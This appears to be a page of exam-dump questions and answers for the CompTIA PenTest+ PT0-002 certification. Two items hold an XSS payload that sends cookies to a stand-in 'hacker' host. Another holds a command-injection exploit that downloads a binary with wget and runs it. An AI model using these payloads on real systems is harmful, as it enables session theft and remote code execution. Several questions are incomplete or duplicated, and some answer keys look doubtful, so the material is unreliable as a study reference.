2023 Reliable Study Materials & Testing Engine for PT0-002 Exam Success!
Validate your Skills with Updated PT0-002 Exam Questions & Answers and Test Engine
NEW QUESTION # 40
A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?
- A. Scan the firewall for vulnerabilities.
- B. Apply patches to the firewall.
- C. Segment the firewall from the cloud.
- D. Notify the client about the firewall.
Answer: D
NEW QUESTION # 41
A penetration tester ran the following commands on a Windows server:
Which of the following should the tester do AFTER delivering the final report?
- A. Remove the tester-created credentials.
- B. Downgrade the svsaccount permissions.
- C. Close the reverse shell connection.
- D. Delete the scheduled batch job.
Answer: A
NEW QUESTION # 42
Given the following code:<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Parameterized queries
- B. Base64 encoding
- C. Web-application firewall
- D. Output encoding
- E. Session tokens
- F. Input validation
Answer: D,F
Explanation:
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
NEW QUESTION # 43
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 44
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
- A. Nmap
- B. tcpdump
- C. hping3
- D. Scapy
Answer: D
Explanation:
https://0xbharath.github.io/art-of-packet-crafting-with-scapy/scapy/creating_packets/index.html
https://scapy.readthedocs.io/en/latest/introduction.html#about-scapy
NEW QUESTION # 45
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?
- A. Remediation
- B. Methodology
- C. Metrics and measures
- D. Executive summary
Answer: A
Explanation:
Explanation
The most important information to have on a penetration testing report that is written for the developers is remediation. Remediation is the process of fixing or mitigating the vulnerabilities or issues that were discovered during the penetration testing. Remediation should include specific recommendations, best practices, and resources to help the developers improve the security of their applications4.
NEW QUESTION # 46
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client.
Which of the following best describes the NEXT step in the engagement?
- A. Scheduling of follow-up actions and retesting
- B. Review of the lessons learned during the engagement
- C. Acceptance by the client and sign-off on the final report
- D. Attestation of findings and delivery of the report
Answer: D
NEW QUESTION # 47
A penetration tester is evaluating a company's network perimeter. The tester has received limited information about defensive controls or countermeasures, and limited internal knowledge of the testing exists. Which of the following should be the FIRST step to plan the reconnaissance activities?
- A. Conduct a ping sweep of the company's netblocks.
- B. Launch an external scan of netblocks.
- C. Check WHOIS and netblock records for the company.
- D. Use DNS lookups and dig to determine the external hosts.
Answer: D
NEW QUESTION # 48
A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?
- A. OWASP Top 10
- B. The Diamond Model of Intrusion Analysis
- C. MITRE ATT&CK framework
- D. NIST Cybersecurity Framework
Answer: C
NEW QUESTION # 49
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?
- A. taskkill /IM "apache" /F
- B. rm -rf /tmp/apache
- C. grep -v apache ~/.bash_history > ~/.bash_history
- D. chmod 600 /tmp/apache
Answer: B
NEW QUESTION # 50
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?
- A. Rescheduling
- B. DDoS defense
- C. Situational awareness
- D. Deconfliction
Answer: D
Explanation:
https://redteam.guide/docs/definitions/
NEW QUESTION # 51
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?
- A. Assume the alert is from the penetration test.
- B. Halt the penetration test.
- C. Contact law enforcement.
- D. Deconflict with the penetration tester.
Answer: D
Explanation:
Explanation
Deconflicting with the penetration tester is the best thing to do next after the security alarms are triggered during a penetration test, as it will help determine whether the alarm was caused by the tester's activity or by an actual threat. Deconflicting is the process of communicating and coordinating with other parties involved in a penetration testing engagement, such as security teams, network administrators, or emergency contacts, to avoid confusion or interference.
NEW QUESTION # 52
A penetration tester is reviewing the following SOW prior to engaging with a client:
"Network diagrams, logical and physical asset inventory, and employees' names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client's Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner." Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)
- A. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
- B. Retaining the SOW within the penetration tester's company for future use so the sales team can plan future engagements
- C. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
- D. Using a software-based erase tool to wipe the client's findings from the penetration tester's laptop
- E. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client's senior leadership team
- F. Seeking help with the engagement in underground hacker forums by sharing the client's public IP address
Answer: D,E
NEW QUESTION # 53
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Answer:
Explanation:
NEW QUESTION # 54
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
- A. Parameterized queries
- B. Base64 encoding
- C. Web-application firewall
- D. Output encoding
- E. Session tokens
- F. Input validation
Answer: D,F
Explanation:
Explanation
Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the < string when writing to an HTML page.
NEW QUESTION # 55
Which of the following BEST describe the OWASP Top 10? (Choose two.)
- A. A web-application security standard
- B. A checklist of Apache vulnerabilities
- C. A list of all the risks of web applications
- D. The risks defined in order of importance
- E. A risk-governance and compliance framework
- F. The most critical risks of web applications
Answer: D,F
NEW QUESTION # 56
A penetration tester recently completed a review of the security of a core network device within a corporate environment. The key findings are as follows:
* The following request was intercepted going to the network device:
GET /login HTTP/1.1
Host: 10.50.100.16
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk
* Network management interfaces are available on the production network.
* An Nmap scan returned the following:
Which of the following would be BEST to add to the recommendations section of the final report? (Choose two.)
- A. Disable HTTP/301 redirect configuration.
- B. Create an out-of-band network for management.
- C. Disable or upgrade SSH daemon.
- D. Enforce enhanced password complexity requirements.
- E. Implement a better method for authentication.
- F. Eliminate network management and control interfaces.
Answer: A,E
NEW QUESTION # 57
......
Regular Free Updates PT0-002 Dumps Real Exam Questions Test Engine: https://pass4sure.actual4dump.com/CompTIA/PT0-002-actualtests-dumps.html